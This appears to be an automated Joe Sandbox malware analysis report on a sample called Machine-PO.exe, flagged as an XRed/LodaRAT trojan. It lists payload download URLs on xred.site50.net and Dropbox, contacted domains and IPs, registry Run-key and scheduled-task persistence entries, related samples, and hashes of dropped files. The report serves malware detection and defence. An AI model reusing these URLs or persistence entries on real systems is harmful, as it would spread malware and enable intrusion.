                              C:\ProgramData\Synaptics\RCX7868.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX7868.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe61%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Desktop\._cache_Machine-PO.exe61%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Documents\PIVFAGEAAV\~$cache192%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		216.58.206.46
                                		truefalse
                                  		high
                                  s-part-0017.t-0009.t-msedge.net
                                  		13.107.246.45
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		172.217.16.193
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://xred.site50.net/syn/Synaptics.rarMachine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlPMachine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/hSynaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845982405.000000000F093000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://xred.site50.net/syn/SSLLibrary.dlMachine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/google.com/JSynaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/XSynaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://xred.site50.net/syn/SUpdate.iniMachine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978pMachine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1842892634.000000000D73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849242482.00000000106FE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dllMachine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.usercontent.google.com/7Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.111.138.100
                                                                                        		unknownUnited States
                                                                                        		3223VOXILITYGBtrue
                                                                                        172.217.16.193
                                                                                        		drive.usercontent.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        216.58.206.46
                                                                                        		docs.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        69.42.215.252
                                                                                        		freedns.afraid.orgUnited States
                                                                                        		17048AWKNET-LLCUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582336
                                                                                        Start date and time:2024-12-30 11:24:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 35s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:28
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Machine-PO.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winEXE@23/39@6/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 41
                                                                                        • Number of non-executed functions: 311
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 184.28.90.27, 52.168.112.67, 20.189.173.21, 20.190.159.23, 52.149.20.212, 4.245.163.56, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, onedscolprdeus04.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        05:25:19API Interceptor154x Sleep call for process: Synaptics.exe modified
                                                                                        05:25:43API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                        05:27:16API Interceptor16x Sleep call for process: splwow64.exe modified
                                                                                        11:25:16Task SchedulerRun new task: UAINOJ.exe path: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                        11:25:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                        11:25:24AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        11:25:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                        11:25:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.111.138.100222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                              Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                        bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                          gry.exeGet hashmaliciousUnknownBrowse
                                                                                                            69.42.215.252222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0017.t-0009.t-msedge.netuniversityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            installer64v9.5.7.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 13.107.246.45
                                                                                                            017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            freedns.afraid.org222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            VOXILITYGB222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                            • 172.111.138.100
                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 104.250.189.221
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 104.243.246.120
                                                                                                            nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 46.243.206.70
                                                                                                            7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 37.221.166.158
                                                                                                            AWKNET-LLCUS222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            37f463bf4616ecd445d4a1937da06e19222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46
                                                                                                            wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                            • 172.217.16.193
                                                                                                            • 216.58.206.46

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\ProgramData\Synaptics\RCX7868.tmp222.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):118
                                                                                                              Entropy (8bit):3.5700810731231707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_ff2ac9f79a8814b13ba43d3943247568a3671e_455b7b6e_065b8e19-107c-47d6-9e1e-b0e025170505\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):1.1338274853507155
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:fjSVpsUIC0Xg3kDzJDzqjLOA/itzxwzuiFYZ24IO8EKDzy:yyU8Xg3kJqjMKzuiFYY4IO8zy
                                                                                                              MD5:4D98AA63383A22F3D831B1E3CB288CC8
                                                                                                              SHA1:B0929BC7397EBD3A0251FC81AA9FBEDB02036DE4
                                                                                                              SHA-256:A633D95A135A24A3350000F57D71D4DAD0CB6C705A8A12718E66CDD048D077FD
                                                                                                              SHA-512:280E3588C6F3B25E97ED80C03210E0AAC30D578E6805F0F1E1F187670E5E78860E830B9D6BCE858B0959870901C50F03A936463F93DF608893FC589572897E1B
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.3.6.0.0.4.1.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.9.4.1.1.9.1.6.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.5.b.8.e.1.9.-.1.0.7.c.-.4.7.d.6.-.9.e.1.e.-.b.0.e.0.2.5.1.7.0.5.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.0.4.a.3.e.b.-.7.4.1.1.-.4.9.5.d.-.9.6.8.b.-.3.0.2.1.9.8.9.3.1.1.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.c.-.0.0.0.1.-.0.0.1.4.-.1.2.a.9.-.a.f.1.b.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD760.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:25:36 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2476986
                                                                                                              Entropy (8bit):1.9191640579217115
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:GV3CJmJlioqBdRmKMD1iCpbqCae+1nrnB0EW4:GVYCioqBd5MD1RqCaVLB
                                                                                                              MD5:BCD2480299F11751269C8DE428630851
                                                                                                              SHA1:5662293E0DCE3E7133259B0255023D7D9B8655E5
                                                                                                              SHA-256:F616C73F12F14B9ACBDAB643EE1814B0CACDF81BBA95A78E86935E43BC04F665
                                                                                                              SHA-512:88B1ED8BAC28A8F51526A2FE82EA5F617EC151EF0EC6E0AE94C984FE97B66BAB48FFF795962A82B0E6665A5E55928D1C58C099E490CDE1C18DF3C2D50F204C9A
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ....... urg............d...............x%......$... E.......P..X...........`.......8...........T.................$.........DE..........0G..............................................................................eJ.......G......GenuineIntel............T............urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA7C.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6310
                                                                                                              Entropy (8bit):3.7131166473433757
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:RSIU6o7wVetbYxP6HOYirJ1sTBm75aMQUu89bPE9sfl9Sm:R6l7wVeJYxP6uYirJS4pDu89bs9sflkm
                                                                                                              MD5:35556BEACA0B616104E2C655080DB1A6
                                                                                                              SHA1:1B2A107C650ECFD1AA900F99868C9EBFE4279B47
                                                                                                              SHA-256:4DD91C822C09B2A20823663C85FF18A8C3FC41B4E2CB32007F85FF31BDBC6A63
                                                                                                              SHA-512:A0C8F2134597EB23678B7CE4B1B525ED23D8E70C7A22FE2DACD7479BD79B8787CE7C420BB29308ABE933E8E32F8DFA7CCAFE8D497CF96295EF4DFEAF3E523451
                                                                                                              Malicious:false
